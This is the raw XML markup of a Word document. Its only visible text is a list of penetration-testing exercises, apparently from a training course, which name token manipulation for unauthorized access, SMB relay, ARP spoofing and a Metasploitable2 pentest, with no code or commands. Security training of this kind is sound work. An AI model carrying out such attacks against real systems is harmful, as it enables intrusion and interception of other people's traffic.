      <w:r w:rsidR="00FF494B" w:rsidRPr="00FF494B">
        <w:t>se Burp Suite to manipulate API tokens for unauthorized access</w:t>
      </w:r>
      <w:r w:rsidR="00C86C4C">
        <w:t>, u</w:t>
      </w:r>
      <w:r w:rsidR="00C86C4C" w:rsidRPr="00C86C4C">
        <w:t>se LinPEAS to identify SUID vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00073887">
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidR="00073887" w:rsidRPr="00073887">
        <w:t>xecute an SMB relay attack using Responder</w:t>
      </w:r>
      <w:r w:rsidR="00073887">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004667EF">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="004667EF" w:rsidRPr="004667EF">
        <w:t>se Ettercap for ARP spoofing to intercept traffic</w:t>
      </w:r>
      <w:r w:rsidR="00EA247F">
        <w:t>, u</w:t>
      </w:r>
      <w:r w:rsidR="00EA247F" w:rsidRPr="00EA247F">
        <w:t>se MobSF to analyze an Android APK for insecure storage</w:t>
      </w:r>
      <w:r w:rsidR="00EA247F">
        <w:t>, c</w:t>
      </w:r>
      <w:r w:rsidR="00EA247F" w:rsidRPr="00EA247F">
        <w:t>onduct a pentest on</w:t>
      </w:r>
      <w:r w:rsidR="00EA247F">
        <w:t xml:space="preserve"> Metasploitable2 VM</w:t>
      </w:r>
      <w:r w:rsidR="00173B57">
        <w:t>, write a PTES report</w:t>
      </w:r>
      <w:r w:rsidR="0067642E">
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidR="0067642E" w:rsidRPr="0067642E">
        <w:t>non-technical summary for stakeholders</w:t>
      </w:r>
      <w:r w:rsidR="0067642E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0080211C" w:rsidRPr="0080211C" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId85"/>
      <w:footerReference w:type="default" r:id="rId86"/>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92474" w14:textId="77777777" w:rsidR="00267441" w:rsidRDefault="00267441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A79C79F" w14:textId="77777777" w:rsidR="00267441" w:rsidRDefault="002674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6DC92" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="67EEA394">
        <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1" w14:textId="14EF469B" w:rsidR="00C776D2" w:rsidRDefault="003B4604"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BC979" w14:textId="77777777" w:rsidR="00267441" w:rsidRDefault="00267441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E6960AE" w14:textId="77777777" w:rsidR="00267441" w:rsidRDefault="0026744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1FCB" w14:textId="68D5EA92" w:rsidR="00C776D2" w:rsidRDefault="00000000">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E4C7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A5E23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3B6137"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C38A99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4003F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64A2FA7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5C2EDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0C4A3B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3D55FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09E4ED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665321A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD46F9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76471D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E56CE38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0876DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F081A72"/>
    <w:lvl w:ilvl="0" w:tplc="926A8D4C">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CD52F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="474218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7044CA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10F03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A420D26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8F244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F012AAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A094D49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7400589">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1109162925">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="939290761">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="78210093">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="409542062">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1770806699">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1178959427">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="341972177">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1158225456">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1376077617">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1288394320">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="17144981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012D62"/>
    <w:rsid w:val="00041678"/>
    <w:rsid w:val="000440F2"/>
    <w:rsid w:val="00055C7B"/>
    <w:rsid w:val="00073887"/>
    <w:rsid w:val="000B17E2"/>
    <w:rsid w:val="00113511"/>
    <w:rsid w:val="00113A14"/>
    <w:rsid w:val="00173B57"/>
    <w:rsid w:val="001C4AF3"/>
    <w:rsid w:val="001D0D39"/>
    <w:rsid w:val="001D3915"/>
    <w:rsid w:val="001E664E"/>
    <w:rsid w:val="00207B0D"/>
    <w:rsid w:val="002135C9"/>
    <w:rsid w:val="0022627A"/>
    <w:rsid w:val="002348D4"/>
    <w:rsid w:val="00241FE2"/>
    <w:rsid w:val="002514C8"/>
    <w:rsid w:val="00267441"/>
    <w:rsid w:val="0029418F"/>
    <w:rsid w:val="00295289"/>
    <w:rsid w:val="002C328A"/>
    <w:rsid w:val="002D0BAB"/>
    <w:rsid w:val="002D36B6"/>
    <w:rsid w:val="002F24EE"/>
    <w:rsid w:val="0033193F"/>
    <w:rsid w:val="00394858"/>
    <w:rsid w:val="00396549"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="003D18C4"/>
    <w:rsid w:val="003F6523"/>
    <w:rsid w:val="003F73AB"/>
    <w:rsid w:val="00410B43"/>
    <w:rsid w:val="004157ED"/>
    <w:rsid w:val="004667EF"/>
    <w:rsid w:val="0048687D"/>
    <w:rsid w:val="0049249D"/>
    <w:rsid w:val="00494017"/>
    <w:rsid w:val="004A4CE0"/>
    <w:rsid w:val="004B2DD1"/>
    <w:rsid w:val="004E6DFE"/>
    <w:rsid w:val="004F2486"/>
    <w:rsid w:val="004F7AF1"/>
    <w:rsid w:val="005059A1"/>
    <w:rsid w:val="005121CA"/>
    <w:rsid w:val="0052459F"/>
    <w:rsid w:val="00551665"/>
    <w:rsid w:val="0057482B"/>
    <w:rsid w:val="005A6530"/>
    <w:rsid w:val="005B2D44"/>
    <w:rsid w:val="005B6040"/>
    <w:rsid w:val="005E2C8C"/>
    <w:rsid w:val="00624F6E"/>
    <w:rsid w:val="00650553"/>
    <w:rsid w:val="00657DED"/>
    <w:rsid w:val="0067642E"/>
    <w:rsid w:val="006F0C40"/>
    <w:rsid w:val="007021F0"/>
    <w:rsid w:val="00717C74"/>
    <w:rsid w:val="00742AC9"/>
    <w:rsid w:val="00782970"/>
    <w:rsid w:val="007D1777"/>
    <w:rsid w:val="007D2C56"/>
    <w:rsid w:val="0080211C"/>
    <w:rsid w:val="008403A6"/>
    <w:rsid w:val="00882CD9"/>
    <w:rsid w:val="00954A38"/>
    <w:rsid w:val="009C06F6"/>
    <w:rsid w:val="009D7392"/>
    <w:rsid w:val="009E3389"/>
    <w:rsid w:val="00A43ABC"/>
    <w:rsid w:val="00A61112"/>
    <w:rsid w:val="00A73A9A"/>
    <w:rsid w:val="00AC50EB"/>
    <w:rsid w:val="00AD3902"/>
    <w:rsid w:val="00B329FE"/>
    <w:rsid w:val="00B3578C"/>
    <w:rsid w:val="00B35AA6"/>
    <w:rsid w:val="00B36234"/>
    <w:rsid w:val="00B421EB"/>
    <w:rsid w:val="00B44096"/>
    <w:rsid w:val="00B66FE7"/>
    <w:rsid w:val="00B92054"/>
    <w:rsid w:val="00BB237F"/>
    <w:rsid w:val="00C07656"/>
    <w:rsid w:val="00C46746"/>
    <w:rsid w:val="00C716D6"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00C77E9B"/>
    <w:rsid w:val="00C86C4C"/>
    <w:rsid w:val="00CA1C9E"/>
    <w:rsid w:val="00CC7BD4"/>
    <w:rsid w:val="00CF4029"/>
    <w:rsid w:val="00D14C96"/>
    <w:rsid w:val="00D657D0"/>
    <w:rsid w:val="00D773BF"/>
    <w:rsid w:val="00D933CC"/>
    <w:rsid w:val="00E04D8E"/>
    <w:rsid w:val="00E233AF"/>
    <w:rsid w:val="00E24048"/>
    <w:rsid w:val="00E268B0"/>
    <w:rsid w:val="00E5073A"/>
    <w:rsid w:val="00EA247F"/>
    <w:rsid w:val="00EB6FBA"/>
    <w:rsid w:val="00ED266F"/>
    <w:rsid w:val="00EF5872"/>
    <w:rsid w:val="00F36846"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="00F4552D"/>
    <w:rsid w:val="00F51C4D"/>
    <w:rsid w:val="00F608AA"/>
    <w:rsid w:val="00F900B0"/>
    <w:rsid w:val="00FC6332"/>
    <w:rsid w:val="00FC71AB"/>
    <w:rsid w:val="00FD07E9"/>
    <w:rsid w:val="00FE688E"/>
    <w:rsid w:val="00FF49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67B39"/>
  <w15:docId w15:val="{12E79056-DB07-44CB-B4D1-13A6888A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 w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D933CC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D2C56"/>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1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D2C56"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D2C56"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D2C5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fontTable" Target="fontTable.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/></Relationships>
</file>

<file path=word/_rels/header1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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96C1B0-B933-4AF5-A13D-6719C457AF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31</Pages>
  <Words>1511</Words>
  <Characters>8619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Mohammed Hussain Shaikh</dc:creator>
  <cp:lastModifiedBy>Mohammed Hussain Shaikh</cp:lastModifiedBy>
  <cp:revision>650</cp:revision>
  <cp:lastPrinted>2026-03-18T09:06:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-21T00:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>